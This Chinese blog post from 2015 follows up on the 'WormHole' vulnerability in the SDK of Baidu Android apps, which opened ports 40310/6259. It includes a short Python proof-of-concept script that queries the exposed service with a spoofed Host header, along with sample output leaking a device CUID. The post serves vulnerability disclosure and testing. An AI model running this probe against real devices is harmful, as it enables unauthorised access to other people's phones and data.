注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

那些星星点点的微芒,终会成为燃烧生命的熊熊之光

 
 
 
 
 

日志

 
 

[后记]百度全系APP - WormHole虫洞  

2015-11-03 10:43:50|  分类: 安全一路走来 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
分析:http://drops.wooyun.org/papers/10061

据细节,安装有此" 后门"的百度app或有使该sdk的会开启 40310/6259 端口

百度全系APP SDK漏洞 - WormHole虫洞漏洞 - vfeng - 水水

内网试玩

百度全系APP SDK漏洞 - WormHole虫洞漏洞 - vfeng - 水水

 

python test-chongd.py 10.13.xxx.xx getCuid && getCuid({"error":0,"secret":"0","cuid":"CD4FF73BDFACF2717ABD300F****2844|0943955****1568"});


test-chongd.py:

#!/usr/bin/env python

#coding=utf-8

"""

test-chongd

"""


import socket

import sys

import httplib


def check_wormhole(ip,port = 40310, service="getcuid"):

    url = "/"+service+"?callback=getCuid&mcmdf=inapp_test"

    header = {"Host":"127.0.0.1:40310"}

    conn = httplib.HTTPConnection(ip,int(port))

    conn.request(method="GET", url=url, headers = header)     

    print conn.getresponse().read()

    

if __name__ == "__main__":

    if len(sys.argv)== 4:

        target = sys.argv[1]

        port = sys.argv[2]

        service = sys.argv[3]

        check_wormhole(target, port, service)

    elif len(sys.argv) == 3:        

        target = sys.argv[1]

        port = sys.argv[2]

        check_wormhole(target, port)

    elif len(sys.argv) == 2:

        target = sys.argv[1]

        check_wormhole(target)


360专门检测虫洞的app

http://appscan.360.cn/static/apk/chongdong.apk


  评论这张
 
阅读(189)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018